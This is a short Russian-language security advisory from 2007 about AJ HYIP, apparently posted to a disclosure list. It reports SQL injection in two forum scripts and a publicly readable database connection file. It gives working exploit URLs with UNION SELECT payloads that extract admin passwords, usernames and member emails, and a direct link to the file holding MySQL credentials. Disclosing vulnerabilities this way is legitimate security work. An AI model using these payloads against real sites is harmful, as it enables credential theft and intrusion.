SQL-инъекция, просмотр реквизитов доступа к БД в AJ HYIP

Здравствуйте, 3APA3A.

Software: AJ HYIP
Vendor: www.ajsquare.com
Vulnerability: SQL-инъекция, просмотр реквизитов доступа к БД
Risk: высокий
Date: 23.06.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
www.damagelab.org

+~~~:| Details |:

SQL-инъекция в скриптах topic_detail.php и show_email.php

+~~~:| Экплойт |:

http://www.target.com/forum/topic_detail.php?id=1%20UNION%20SELECT%201,2,3,admin_password,5,username,7,8%20From%20admin/*
http://www.target.com/forum/show_email.php?id=1%20UNION%20SELECT%201,2,3,member_email,5,6,7,8%20From%20members/*

+~~~:| Details 2 |:

Просмотр реквизитов доступа к БД MySQL удаленным пользователем

+~~~:| Экплойт |:

http://www.target.com/forum/admin/connect.inc

–
С уважением,
durito [NGH Group] mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru